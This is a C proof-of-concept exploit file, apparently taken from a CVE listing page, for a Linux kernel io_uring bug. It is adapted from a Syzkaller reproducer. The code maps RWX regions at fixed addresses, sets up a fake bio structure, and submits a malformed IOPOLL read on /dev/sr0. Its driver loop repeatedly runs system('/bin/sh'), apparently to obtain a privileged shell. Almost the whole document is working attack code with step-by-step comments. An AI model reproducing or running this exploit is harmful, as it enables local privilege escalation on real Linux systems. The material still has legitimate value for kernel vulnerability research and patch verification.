/*
 * 4837 Total CVEs
 * 26 Years
 * GitHub
 * README.md
 * Rendering markdown...
 * POC / exploit.c C
 */
// Originally generated by Syzkaller, optimized by us
#define _GNU_SOURCE 

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>
#include <assert.h>
#include <stddef.h>
#include "io_uring.h"

// Value stored in io_uring_params.flags by execute_one().
#define FLAG_IORING_SETUP_IOPOLL ((1))
// Fixed scratch addresses used by execute_one(); all of them lie inside the
// 0x20000000..0x21000000 region that main() maps.
// RING / SQES: slots that receive the two mmap() results from
// syz_io_uring_setup() (passed as its a4 / a5 arguments).
#define RING ((0x20000240ULL))
#define SQES ((0x20000040ULL))
// Location of the struct io_uring_params; execute_one() also reuses it for
// the device path string.
#define IO_URING_PARAMS ((0x20000080ULL))

// Target addresses handed to mmap(MAP_FIXED) for the ring and the SQE array.
#define RING_VMA ((0x20ffd000))
#define SQES_VMA ((0x20ffc000))

// Fallback syscall numbers, used only when the system headers do not
// already define them.
#ifndef __NR_io_uring_enter
#define __NR_io_uring_enter 426
#endif
#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup 425
#endif

// Base of the second region mapped by main(); main() passes it to
// setup_fake_bio().
#define BOUNCE_ADDR 0x30000000ul

// Per-thread state shared by segv_handler() and the NONFAILING() macro.
// clone_ongoing: when non-zero, segv_handler() exits immediately (nothing in
//                the visible code ever sets it).
// skip_segv:     nesting counter, incremented/decremented by NONFAILING().
// segv_env:      jump buffer that segv_handler() returns to via _longjmp().
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;

/*
 * SIGSEGV/SIGBUS handler (registered by install_segv_handler()).
 *
 * When a NONFAILING() region is active (skip_segv != 0) and the faulting
 * address lies outside the [1 MiB, 100 MiB] window, execution resumes at the
 * _setjmp() point stored in segv_env. In every other case, including
 * whenever clone_ongoing is set, the process exits with the signal number as
 * its exit status.
 */
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
    if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0)
        exit(sig);

    const uintptr_t window_lo = 1 << 20;
    const uintptr_t window_hi = 100 << 20;
    const uintptr_t fault_addr = (uintptr_t)info->si_addr;

    const bool recovering = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
    const bool outside_window = !(fault_addr >= window_lo && fault_addr <= window_hi);

    if (!recovering || !outside_window)
        exit(sig);

    _longjmp(segv_env, 1);
}

static void install_segv_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = SIG_IGN;
    syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
    syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
    memset(&sa, 0, sizeof(sa));
    sa.sa_sigaction = segv_handler;
    sa.sa_flags = SA_NODEFER | SA_SIGINFO;
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS, &sa, NULL);
}

// NONFAILING(stmts): runs `stmts` with fault recovery enabled.
// Increments skip_segv, saves a jump point in segv_env with _setjmp(), then
// executes the arguments. If segv_handler() long-jumps back, the remaining
// statements are skipped. skip_segv is decremented either way. The whole
// construct is a GNU statement expression that evaluates to 1 when the
// statements ran to completion and 0 when they were interrupted.
#define NONFAILING(...) ({ int ok = 1; __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); if (_setjmp(segv_env) == 0) { __VA_ARGS__; } else ok = 0; __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); ok; })

/* Suspends the caller for `ms` milliseconds by handing ms * 1000 to usleep(). */
static void sleep_ms(uint64_t ms)
{
    const uint64_t usec_per_ms = 1000;

    usleep(ms * usec_per_ms);
}

/*
 * Returns the CLOCK_MONOTONIC time in whole milliseconds.
 * Terminates the process with status 1 if the clock cannot be read.
 */
static uint64_t current_time_ms(void)
{
    struct timespec now;

    if (clock_gettime(CLOCK_MONOTONIC, &now) != 0)
        exit(1);

    const uint64_t ms_from_sec = (uint64_t)now.tv_sec * 1000;
    const uint64_t ms_from_nsec = (uint64_t)now.tv_nsec / 1000000;
    return ms_from_sec + ms_from_nsec;
}

/*
 * Formats a printf-style message (truncated to 1023 characters) and writes it
 * to an existing file with a single write() call.
 *
 * file: path to open with O_WRONLY | O_CLOEXEC (the file is not created).
 * what: printf-style format string, followed by its arguments.
 *
 * Returns true when the whole message was written. Returns false when the
 * file could not be opened or the write was short/failed; in the latter case
 * errno is the value left by write(), not by the subsequent close().
 */
static bool write_file(const char* file, const char* what, ...)
{
    char text[1024];
    va_list ap;

    va_start(ap, what);
    vsnprintf(text, sizeof(text), what, ap);
    va_end(ap);
    text[sizeof(text) - 1] = 0;
    int text_len = strlen(text);

    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;

    bool complete = write(fd, text, text_len) == text_len;
    int write_errno = errno;
    close(fd);
    if (!complete)
        errno = write_errno;
    return complete;
}

// Element sizes, in bytes, used when sizing and indexing the SQE array and
// the CQE array.
#define SIZEOF_IO_URING_SQE 64
#define SIZEOF_IO_URING_CQE 16
// Hard-coded byte offsets of fields inside the mmapped ring region.
// Only SQ_TAIL_OFFSET, SQ_RING_MASK_OFFSET, SQ_RING_ENTRIES_OFFSET,
// CQ_RING_ENTRIES_OFFSET and CQ_CQES_OFFSET are referenced in the visible
// code (by syz_io_uring_submit()).
// NOTE(review): presumably these mirror the kernel's ring layout for the
// kernel version this was written against -- verify before reuse.
#define SQ_HEAD_OFFSET 0
#define SQ_TAIL_OFFSET 64
#define SQ_RING_MASK_OFFSET 256
#define SQ_RING_ENTRIES_OFFSET 264
#define SQ_FLAGS_OFFSET 276
#define SQ_DROPPED_OFFSET 272
#define CQ_HEAD_OFFSET 128
#define CQ_TAIL_OFFSET 192
#define CQ_RING_MASK_OFFSET 260
#define CQ_RING_ENTRIES_OFFSET 268
#define CQ_RING_OVERFLOW_OFFSET 284
#define CQ_FLAGS_OFFSET 280
#define CQ_CQES_OFFSET 320

// mmap() file offsets selecting which io_uring region to map.
// IORING_OFF_SQ_RING is used by syz_io_uring_setup() but is not defined
// here; presumably it comes from "io_uring.h" -- verify.
// #define IORING_OFF_SQ_RING 0
#define IORING_OFF_SQES 0x10000000ULL

// Creates an io_uring instance and maps its ring and SQE array at
// caller-chosen fixed addresses.
//   a0: number of entries passed to io_uring_setup
//   a1: address of a struct io_uring_params; passed to the syscall and then
//       read back for the offsets and entry counts used to size the mappings
//   a2: address for the ring mapping (used with MAP_FIXED)
//   a3: address for the SQE array mapping (used with MAP_FIXED)
//   a4: address of a void* slot that receives the ring mmap() result
//   a5: address of a void* slot that receives the SQE array mmap() result
// Returns the io_uring_setup result after it has passed through a uint32_t.
//
// NOTE(review): nothing is checked here. Because the syscall result is held
// in a uint32_t, a failure (-1) is returned as 0xffffffff, which does not
// compare equal to -1 where long is 64 bits. A failed mmap() stores
// MAP_FAILED in the output slot.
// NOTE(review): execute_one() calls this a second time with a5 == 0, so the
// final store faults; that call is wrapped in NONFAILING(). Do not reorder
// the statements below without checking that caller.
static long syz_io_uring_setup(volatile long a0, volatile long a1, volatile long a2, volatile long a3, volatile long a4, volatile long a5)
{
    uint32_t entries = (uint32_t)a0;
    struct io_uring_params* setup_params = (struct io_uring_params*)a1;
    void* vma1 = (void*)a2;
    void* vma2 = (void*)a3;
    void** ring_ptr_out = (void**)a4;
    void** sqes_ptr_out = (void**)a5;
    uint32_t fd_io_uring = syscall(__NR_io_uring_setup, entries, setup_params);
    // A single mapping sized for the larger of the SQ ring and the CQ ring is
    // created at the SQ ring offset.
    uint32_t sq_ring_sz = setup_params->sq_off.array + setup_params->sq_entries * sizeof(uint32_t);
    uint32_t cq_ring_sz = setup_params->cq_off.cqes + setup_params->cq_entries * SIZEOF_IO_URING_CQE;
    uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz;
    *ring_ptr_out = mmap(vma1, ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE | MAP_FIXED, fd_io_uring, IORING_OFF_SQ_RING);
    // The SQE array is a separate mapping of sq_entries fixed-size entries.
    uint32_t sqes_sz = setup_params->sq_entries * SIZEOF_IO_URING_SQE;
    *sqes_ptr_out = mmap(vma2, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE | MAP_FIXED, fd_io_uring, IORING_OFF_SQES);
    return fd_io_uring;
}

// Queues one submission entry on a mapped ring.
//   a0: base address of the ring mapping
//   a1: base address of the SQE array mapping
//   a2: address of the 64-byte SQE to copy in
//   a3: requested SQE slot; reduced modulo the ring's entry count when that
//       count is non-zero
// The SQE is copied into its slot, the slot number is written to the index
// array at (tail & mask), and the tail is then published with a release
// store. Always returns 0.
static long syz_io_uring_submit(volatile long a0, volatile long a1, volatile long a2, volatile long a3)
{
    char* const ring = (char*)a0;
    char* const sqe_array = (char*)a1;
    const char* const src_sqe = (char*)a2;
    uint32_t slot = (uint32_t)a3;

    const uint32_t sq_entries = *(uint32_t*)(ring + SQ_RING_ENTRIES_OFFSET);
    const uint32_t cq_entries = *(uint32_t*)(ring + CQ_RING_ENTRIES_OFFSET);
    if (sq_entries != 0)
        slot %= sq_entries;

    memcpy(sqe_array + slot * SIZEOF_IO_URING_SQE, src_sqe, SIZEOF_IO_URING_SQE);

    // The index array is located right after the CQE array, rounded up to a
    // 64-byte boundary.
    const uint32_t index_array_off = (CQ_CQES_OFFSET + cq_entries * SIZEOF_IO_URING_CQE + 63) & ~63;
    uint32_t* const index_array = (uint32_t*)(ring + index_array_off);

    const uint32_t mask = *(uint32_t*)(ring + SQ_RING_MASK_OFFSET);
    uint32_t* const tail_ptr = (uint32_t*)(ring + SQ_TAIL_OFFSET);
    const uint32_t tail = *tail_ptr;

    index_array[tail & mask] = slot;
    __atomic_store_n(tail_ptr, tail + 1, __ATOMIC_RELEASE);
    return 0;
}

/*
 * Kills child `pid` (and its process group) with SIGKILL and reaps it.
 *
 * pid:    child process id; also used, negated, as a process-group target.
 * status: receives the wait status of whichever child the last waitpid()
 *         call reaped.
 *
 * The child is first polled for about 100 ms. If it has still not been
 * reaped, a byte is written to every /sys/fs/fuse/connections/<id>/abort
 * file that can be opened (best effort, errors ignored) and the function
 * then blocks until waitpid() returns `pid`.
 */
static void kill_and_wait(int pid, int* status)
{
    kill(-pid, SIGKILL);
    kill(pid, SIGKILL);

    int attempts = 0;
    while (attempts < 100) {
        if (waitpid(-1, status, WNOHANG | __WALL) == pid)
            return;
        usleep(1000);
        attempts++;
    }

    DIR* conns = opendir("/sys/fs/fuse/connections");
    if (conns != NULL) {
        struct dirent* entry;
        while ((entry = readdir(conns)) != NULL) {
            const char* name = entry->d_name;
            if (!strcmp(name, ".") || !strcmp(name, ".."))
                continue;

            char abort_path[300];
            snprintf(abort_path, sizeof(abort_path), "/sys/fs/fuse/connections/%s/abort", name);
            int abort_fd = open(abort_path, O_WRONLY);
            if (abort_fd == -1)
                continue;
            if (write(abort_fd, abort_path, 1) < 0) {
                /* best effort: a failed abort request is ignored */
            }
            close(abort_fd);
        }
        closedir(conns);
    }

    while (waitpid(-1, status, __WALL) != pid) {
        /* keep reaping until the target child is collected */
    }
}

/*
 * Per-child preparation, called by loop() in the forked child before
 * execute_one(). All three steps are best effort; no result is checked.
 */
static void setup_test()
{
    static const char oom_adj_path[] = "/proc/self/oom_score_adj";

    // Have the kernel deliver SIGKILL to this process when its parent dies.
    prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);

    // Move into a process group of our own, so that the parent's
    // kill(-pid, SIGKILL) in kill_and_wait() reaches this child's whole group.
    setpgrp();

    // Write 1000 to this process's oom_score_adj file.
    (void)write_file(oom_adj_path, "1000");
}

// Forward declaration: loop() calls execute_one(), which is defined further
// down in this file.
static void execute_one(void);

// Extra waitpid() flags used by loop() when polling for its child.
#define WAIT_FLAGS __WALL

/*
 * Driver loop; never returns.
 *
 * Each iteration forks a child that runs setup_test() and execute_one() and
 * then exits with status 0. The parent polls for the child about once per
 * millisecond; a child still running after 5000 ms is killed and reaped by
 * kill_and_wait(). From the second iteration onward, /bin/sh is run through
 * system() after the child has been reaped.
 * Exits with status 1 if fork() fails.
 */
static void loop(void)
{
    for (int iter = 0;; iter++) {
        const int pid = fork();
        if (pid < 0)
            exit(1);
        if (pid == 0) {
            setup_test();
            execute_one();
            exit(0);
        }

        int status = 0;
        const uint64_t started_at = current_time_ms();
        while (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) != pid) {
            sleep_ms(1);
            if (current_time_ms() - started_at >= 5000) {
                kill_and_wait(pid, &status);
                break;
            }
        }

        // Original author's note: the shell is tried only after at least one
        // full iteration has completed, and after every iteration from then
        // on rather than after a larger fixed number of attempts.
        if (iter > 0)
            system("/bin/sh");
    }
}

// Indices into r[] below.
#define IO_URING_FD_OFFSET ((0))
#define RING_OFFSET ((1))
#define SQES_OFFSET ((2))

// Results saved by execute_one(): r[0] = ring file descriptor, r[1] = ring
// mapping pointer, r[2] = SQE array mapping pointer. r[3] is not used in the
// visible code.
uint64_t r[4] = {0xffffffffffffffff, 0x0, 0x0, 0xffffffffffffffff};

// Performs one attempt; loop() runs it in a freshly forked child.
// Every hard-coded 0x200000xx address used here lies inside the region that
// main() maps at 0x20000000. The statement order is significant.
void execute_one(void)
{
    intptr_t res = 0;
    // Step 1: zero the io_uring_params at IO_URING_PARAMS except for flags,
    // then create the first ring with one requested entry.
    struct io_uring_params *params = (struct io_uring_params *)IO_URING_PARAMS;
    params->sq_entries = 0;
    params->cq_entries = 0;
    params->flags = FLAG_IORING_SETUP_IOPOLL;
    params->sq_thread_cpu = 0;
    params->sq_thread_idle = 0;
    memset(&(params->resv), 0, sizeof(params->resv));
    res = -1;
    res = syz_io_uring_setup(1, IO_URING_PARAMS, RING_VMA, SQES_VMA, RING, SQES);
    
    // Save the ring fd plus the two mapping pointers that
    // syz_io_uring_setup() stored in the RING and SQES slots.
    // NOTE(review): syz_io_uring_setup() returns the fd through a uint32_t,
    // so this comparison may never detect a failed setup where long is
    // 64 bits -- verify.
    if (res != -1) {
        r[IO_URING_FD_OFFSET] = res;
        r[RING_OFFSET] = *(uint64_t*)RING;
        r[SQES_OFFSET] = *(uint64_t*)SQES;
    }

    // Step 2: reuse the params memory to hold the path "/dev/sr0" and open
    // it with O_DIRECT | O_NONBLOCK | O_NOCTTY. The author describes
    // /dev/sr0 as a SCSI CD-ROM device.
    // dirfd is -100 as a 64-bit value (AT_FDCWD on Linux).
    // NOTE(review): the openat() result is discarded; the SQE below
    // hard-codes fd 4, presumably assuming this open returns descriptor 4 --
    // TODO confirm.
    memcpy((void*)IO_URING_PARAMS, "/dev/sr0\000", 9);
    uint64_t dirfd = 0xffffffffffffff9cul;
    uint64_t flags = O_DIRECT | O_NONBLOCK | O_NOCTTY;
    assert(flags == 0x4900ul);
    syscall(__NR_openat, dirfd, IO_URING_PARAMS, flags, NULL);

    // Step 3: build a submission entry at 0x20000100.
    // The asserts check that the struct field offsets match the raw
    // addresses (0x20000100 + offset) this code was derived from.
    assert(offsetof(struct io_uring_sqe, opcode) == 0x20000100 - 0x20000100);
    assert(offsetof(struct io_uring_sqe, fd) == 0x20000104 - 0x20000100);
    assert(offsetof(struct io_uring_sqe, addr) == 0x20000110 - 0x20000100);
    assert(offsetof(struct io_uring_sqe, len) == 0x20000118 - 0x20000100);

    struct io_uring_sqe *new_entry = (struct io_uring_sqe *)(0x20000100);

    // A read request on fd 4 into the buffer at 0x20000000 with length
    // 0xfffffd61; the remaining fields touched here are zeroed.
    new_entry->opcode = IORING_OP_READ;
    assert(new_entry->opcode == 0x16);
    new_entry->fd = 4;
    new_entry->addr = 0x20000000;
    new_entry->len = 0xfffffd61;
    new_entry->file_index = 0;
    new_entry->__pad2[0] = 0;
    new_entry->__pad2[1] = 0;

    // Step 4: copy the entry into SQE slot 0 of the first ring and advance
    // the submission tail.
    syz_io_uring_submit(r[RING_OFFSET], r[SQES_OFFSET], new_entry, 0);

    // Step 5: re-initialise the params (the path string written in step 2
    // overwrote the start of the struct) and run the setup helper a second
    // time at the same fixed addresses.
    // The last argument is 0, so the helper's final store through that
    // pointer faults; NONFAILING() recovers from the fault. The returned fd
    // is discarded, so r[] still refers to the first ring.
    params->sq_entries = 0;
    params->cq_entries = 0;
    params->flags = FLAG_IORING_SETUP_IOPOLL;
    params->sq_thread_cpu = 0;
    params->sq_thread_idle = 0;
    memset(&(params->resv), 0, sizeof(params->resv));
    NONFAILING(syz_io_uring_setup(1, IO_URING_PARAMS, RING_VMA, SQES_VMA, RING, 0));

    // Step 6: call io_uring_enter on the first ring's fd with
    // to_submit = 0x7e93, min_complete = 0x5cab, flags = 2 and no signal
    // mask (argument names per the io_uring_enter man page -- verify).
    syscall(__NR_io_uring_enter, r[IO_URING_FD_OFFSET], 0x7e93, 0x5cab, 2ul, 0ul, 0ul);
}

// Defined in another translation unit; main() passes it BOUNCE_ADDR, the
// base of the second mapping created below.
extern void setup_fake_bio(uint64_t addr);

/*
 * Program entry point.
 *
 * Maps two 16 MiB anonymous read/write/execute regions at fixed addresses:
 * the scratch region at 0x20000000 that execute_one() addresses directly,
 * and the region at BOUNCE_ADDR that is handed to setup_fake_bio(). It then
 * installs the fault handler and enters loop(), which does not return.
 *
 * Exits with EXIT_FAILURE, after printing the mmap() error, if either
 * mapping cannot be created.
 */
int main(void)
{
    const int mmap_flags = MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS;
    const int mmap_prot = PROT_READ | PROT_WRITE | PROT_EXEC;
    const size_t region_len = 0x1000000ul;

    // Sanity checks that the symbolic constants match the raw values this
    // code was derived from.
    assert(mmap_flags == 0x32);
    assert(PROT_NONE == 0);
    assert(mmap_prot == 7);

    void *scratch = mmap((void *)0x20000000ul, region_len, mmap_prot, mmap_flags, -1, 0);
    if (scratch == MAP_FAILED) {
        perror("Error mmap'ing scratch region");
        exit(EXIT_FAILURE);
    }

    void *bounce = mmap((void *)BOUNCE_ADDR, region_len, mmap_prot, mmap_flags, -1, 0);
    if (bounce == MAP_FAILED) {
        perror("Error mmap'ing launchpad page");
        exit(EXIT_FAILURE);
    }

    // Write one byte to the first page of the new mapping, only after the
    // mapping is known to exist.
    char *ptr = bounce;
    ptr[0] = 'A';

    setup_fake_bio(BOUNCE_ADDR);

    install_segv_handler();
    loop();
    return 0;
}